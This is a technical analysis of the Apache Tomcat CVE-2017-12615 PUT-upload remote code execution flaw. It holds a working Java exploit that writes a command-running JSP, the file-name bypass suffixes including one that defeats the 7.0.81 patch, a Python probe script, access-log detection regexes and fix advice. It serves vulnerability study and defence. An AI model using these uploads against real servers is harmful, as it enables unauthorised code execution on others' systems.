On September 19, 2017, Apache Tomcat officially disclosed two serious security vulnerabilities. CVE-2017-12615 is a remote code execution vulnerability: an attacker uploads a malicious JSP file to the server with an HTTP PUT request and then executes arbitrary code on the server by requesting that JSP. The latest patch at the time of writing (7.0.81) does not completely fix the vulnerability. We will continue to track this vulnerability and publish updated information as soon as it is available.
Vulnerability number
CVE-2017-12615
Vulnerability Name
Apache Tomcat Remote Code Execution vulnerability
Vulnerability Rating
Serious
Impact Range
Apache Tomcat 7.0.0 to 7.0.79 (with HTTP PUT enabled, i.e. readonly=false on the DefaultServlet; the trailing-space, trailing-dot and ::$DATA variants below depend on Windows file-name handling, so the analysis environment is Windows)
Vulnerability Analysis
1. Creating a debugging environment
Download the Tomcat 7.0.79 source code: http://archive.apache.org/dist/tomcat/tomcat-7/v7.0.79/src/apache-tomcat-7.0.79-src.zip
After unpacking, create a pom.xml file in the unpacked root directory with the following content:
<?xml version="1.0" encoding="UTF-8"?>
<!--suppress All-->
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <groupId>org.apache.tomcat</groupId>
    <artifactId>Tomcat7.0.79</artifactId>
    <name>tomcat7.0.79 src</name>
    <version>7.0.79</version>
    ...........
</project>
Edit conf/web.xml and add the following init-param to the DefaultServlet definition (the servlet named "default"). This enables PUT and DELETE on the default servlet, which is the precondition for the vulnerability; the default value is true:
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>
Open the pom.xml file in IDEA.
Configure the run/debug startup items as follows (shown in the original as a screenshot):
2. PUT with nothing appended after .jsp
package com.zxsoft;

import java.io.OutputStream;
import java.net.Socket;

/**
 * Sends a raw HTTP PUT to write a JSP through Tomcat's DefaultServlet.
 * The request line is built by hand so that the file-name suffixes tried
 * in the following steps (%7c, %20, ., ::$DATA, /) reach Tomcat exactly
 * as written, without any client-side normalisation.
 */
public class TomcatExp {
    public static void main(String[] args) throws Exception {
        Socket s = new Socket("localhost", 8080);
        OutputStream out = s.getOutputStream();
        // JSP body: launches calc.exe when the page is compiled and requested
        String spayload = "<%Process proc = Runtime.getRuntime().exec(\"calc\");%>";
        // Plain file name: nothing appended after 1.jsp
        String head = "PUT /upload/" + "1.jsp" + " HTTP/1.1\r\n" + "Host: " + "localhost:8080" + "\r\n"
                + "Connection: keep-alive\r\n" + "Accept: text/html,application/xhtml+xml,application/xml,*/*\r\n"
                + "Accept-Encoding: gzip, deflate\r\n" + "Accept-Language: zh-cn\r\n" + "Content-Length: "
                + spayload.getBytes().length + "\r\n" + "\r\n";
        out.write(head.getBytes());
        out.write(spayload.getBytes());
        out.flush();
        s.close();
    }
}
The request is dispatched to JspServlet (the *.jsp mapping), which does not write files, so the file cannot be created.
3. Append %7c (a URL-encoded |) after .jsp
    String head = "PUT /upload/" + "1.jsp%7c" + " HTTP/1.1\r\n" + "Host: " + "localhost:8080" + "\r\n"
The request now enters DefaultServlet, because the name no longer ends in .jsp and so misses the JspServlet mapping.
DefaultServlet checks the readonly parameter (false, so the write is allowed).
It then tries to write the file.
An exception is thrown: | is not a valid character in a Windows file name, so the write fails with a file-name syntax error.
4. Append a space (%20) after .jsp
    String head = "PUT /upload/" + "1.jsp%20" + " HTTP/1.1\r\n" + "Host: " + "localhost:8080" + "\r\n"
The request enters DefaultServlet.
The file is created successfully: Windows strips a trailing space from the file name, so the content lands in 1.jsp.
Appending a . (dot) behaves the same way, since Windows strips trailing dots too.
5. Append ::$DATA after .jsp
    String head = "PUT /upload/" + "1.jsp::$DATA" + " HTTP/1.1\r\n" + "Host: " + "localhost:8080" + "\r\n"
The request enters DefaultServlet.
The file is created successfully: on NTFS, 1.jsp::$DATA names the default (unnamed) data stream of 1.jsp, so the content lands in 1.jsp.
6. Append / after .jsp
    String head = "PUT /upload/" + "1.jsp/" + " HTTP/1.1\r\n" + "Host: " + "localhost:8080" + "\r\n"
The trailing / is dropped when the path is turned into a java.io.File, and the file 1.jsp is created successfully. Unlike the previous variants this does not depend on Windows file-name rules.
7. Version 7.0.81
In the trailing-space case, the canonical path (canPath) and the absolute path (absPath) no longer match, so the lookup returns null and nothing is written: fixed.
In the ::$DATA case, canPath is empty and the write is rejected: fixed.
In the trailing-slash case the file is still created successfully: the vulnerability is not fixed in 7.0.81.
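To try the six request-line variants above against a lab instance (including a 7.0.81 build, to confirm which of them still work there), the following probe is an added example written for this page; it is not code from the original post. It assumes Tomcat on localhost:8080 with readonly=false and a context path of /upload (both assumptions; adjust for your lab), writes a harmless marker JSP instead of launching calc, and gives each variant its own file name so that the follow-up GET tells you which PUT actually produced a compiled, executable page. Run it only against systems you are authorised to test.

```python
"""Probe the CVE-2017-12615 PUT variants against a lab Tomcat.

Added example, not the original post's code.  Host, port, context path and
file-name prefix are assumptions for a lab set-up; change them as needed.
"""
import socket
import sys

# Harmless marker: if a GET of the plain .jsp name returns this string, the
# file was written through DefaultServlet and then compiled by JspServlet.
MARKER = "tomcat-put-probe"
PAYLOAD = '<%% out.println("%s"); %%>' % MARKER

# Suffixes appended to the .jsp name in the request line, in the order the
# analysis tries them: plain, %7c, %20, ., ::$DATA, /
SUFFIXES = ["", "%7c", "%20", ".", "::$DATA", "/"]


def build_request(method, host, port, path, body=b""):
    """Build a raw HTTP/1.1 request; `path` is used verbatim so the odd
    suffixes reach Tomcat exactly as written (no client-side normalisation)."""
    head = (
        "%s %s HTTP/1.1\r\n"
        "Host: %s:%d\r\n"
        "Connection: close\r\n"
        "Content-Type: application/octet-stream\r\n"
        "Content-Length: %d\r\n"
        "\r\n" % (method, path, host, port, len(body))
    )
    return head.encode("ascii") + body


def status_of(response):
    """Return the status code of a raw HTTP response, or None if unparsable."""
    first = response.split(b"\r\n", 1)[0].decode("ascii", "replace").split(" ")
    if len(first) < 2 or not first[1].isdigit():
        return None
    return int(first[1])


def send(host, port, raw, timeout=5.0):
    """Send `raw` over a fresh TCP connection and return the full response."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(raw)
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


def probe(host="localhost", port=8080, context="/upload", prefix="probe"):
    """Try every suffix with its own file name.

    Returns {suffix: (put_status, executed)} where `executed` is True when a
    GET of the plain name returns 200 and echoes MARKER, i.e. the PUT produced
    a real, compiled JSP rather than an error or a differently named file.
    """
    results = {}
    for i, suffix in enumerate(SUFFIXES):
        name = "%s%d.jsp" % (prefix, i)
        put = build_request("PUT", host, port, context + "/" + name + suffix,
                            PAYLOAD.encode("ascii"))
        put_status = status_of(send(host, port, put))
        resp = send(host, port, build_request("GET", host, port, context + "/" + name))
        executed = status_of(resp) == 200 and MARKER.encode("ascii") in resp
        results[suffix] = (put_status, executed)
    return results


def cleanup(host="localhost", port=8080, context="/upload", prefix="probe"):
    """Delete the probe files again (DefaultServlet accepts DELETE when
    readonly=false); returns {name: status}."""
    out = {}
    for i in range(len(SUFFIXES)):
        name = "%s%d.jsp" % (prefix, i)
        out[name] = status_of(send(host, port,
                                   build_request("DELETE", host, port, context + "/" + name)))
    return out


if __name__ == "__main__":
    target_host = sys.argv[1] if len(sys.argv) > 1 else "localhost"
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 8080
    for suffix, (code, ok) in probe(target_host, target_port).items():
        print("%-10r PUT -> %s   executable JSP: %s" % (suffix, code, ok))
    cleanup(target_host, target_port)
```

On a vulnerable 7.0.79 you should see executable JSPs for the %20, ., ::$DATA and / variants; on 7.0.81 only the trailing-slash variant should remain, matching step 7 above. A raw socket is used on purpose: most HTTP client libraries would normalise the trailing dot, space or slash away before the request leaves the client.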
Exploitation
Request the uploaded JSP file; the code executes successfully.
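On the detection side, the same suffixes give a simple access-log signature. The following is an added example written for this page, not code from the original post. It parses lines in the Tomcat AccessLogValve "common" pattern (%h %l %u %t "%r" %s %b), flags PUT and DELETE requests whose target names a .jsp, marks those that use one of the suffixes from the analysis, and marks PUTs that Tomcat answered with 201 or 204, meaning DefaultServlet actually wrote the file. It assumes %r records the request line as received, with the suffix still percent-encoded; the log lines are constructed for the example and their status codes are illustrative.

```python
"""Flag CVE-2017-12615-style PUT attempts in Tomcat access logs.

Added example, not code from the original post.  Assumes the AccessLogValve
"common" pattern (%h %l %u %t "%r" %s %b) and that %r records the request
line as received, i.e. with the suffix still percent-encoded.
"""
import re

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)

# A .jsp/.jspx name followed by one of the suffixes from the analysis:
# trailing slash, trailing dot, %20 (space), %7c (|) or ::$DATA (plain or
# percent-encoded).  Case-insensitive because Tomcat decodes %7c and %7C alike.
BYPASS_RE = re.compile(
    r'\.jspx?(?:/|\.|%20|%7c|::\$data|%3a%3a\$data)$',
    re.IGNORECASE,
)

# Constructed sample log; the status codes are illustrative, not captured.
SAMPLE_LOG = """\
127.0.0.1 - - [19/Sep/2017:10:00:01 +0800] "GET /upload/index.jsp HTTP/1.1" 200 512
10.0.0.5 - - [19/Sep/2017:10:00:02 +0800] "PUT /upload/1.jsp HTTP/1.1" 405 -
10.0.0.5 - - [19/Sep/2017:10:00:03 +0800] "PUT /upload/1.jsp%7c HTTP/1.1" 500 -
10.0.0.5 - - [19/Sep/2017:10:00:04 +0800] "PUT /upload/1.jsp%20 HTTP/1.1" 201 -
10.0.0.5 - - [19/Sep/2017:10:00:05 +0800] "PUT /upload/1.jsp::$DATA HTTP/1.1" 201 -
10.0.0.5 - - [19/Sep/2017:10:00:06 +0800] "PUT /upload/1.jsp/ HTTP/1.1" 201 -
10.0.0.5 - - [19/Sep/2017:10:00:07 +0800] "GET /upload/1.jsp HTTP/1.1" 200 39
10.0.0.9 - - [19/Sep/2017:10:00:08 +0800] "PUT /api/items/1 HTTP/1.1" 200 17
"""


def parse_line(line):
    """Return the parsed fields of one access-log line, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_suspicious(lines):
    """Return findings for PUT/DELETE requests aimed at a .jsp path.

    Each finding carries `bypass_suffix` (one of the analysed suffixes is
    present) and `created` (a PUT that Tomcat answered with 201 or 204,
    meaning DefaultServlet actually wrote the file).
    """
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unexpected format: skip rather than guess
        method = rec["method"].upper()
        path = rec["target"].split("?", 1)[0]
        if method not in ("PUT", "DELETE") or ".jsp" not in path.lower():
            continue
        status = int(rec["status"])
        findings.append({
            "host": rec["host"],
            "time": rec["time"],
            "method": method,
            "target": rec["target"],
            "status": status,
            "bypass_suffix": BYPASS_RE.search(path) is not None,
            "created": method == "PUT" and status in (201, 204),
        })
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG.splitlines()):
        flag = "WRITTEN" if f["created"] else "attempt"
        print("%s %s %s %s -> %d [%s%s]" % (
            f["time"], f["host"], f["method"], f["target"], f["status"],
            flag, ", bypass suffix" if f["bypass_suffix"] else ""))
```

Any PUT against a .jsp path is worth an alert on a server that is not supposed to accept uploads at all; the 201/204 responses are the ones to treat as confirmed writes and follow up with a check of the webapp directory.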
Fix suggestions
Set the readonly init-param of the DefaultServlet in conf/web.xml to true (or remove the parameter; true is the default), which disables PUT and DELETE on the default servlet. Do not rely on 7.0.81 alone: as shown in step 7, the trailing-slash variant still creates the file on that version, so keep PUT disabled until running a release that closes it.
Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability Analysis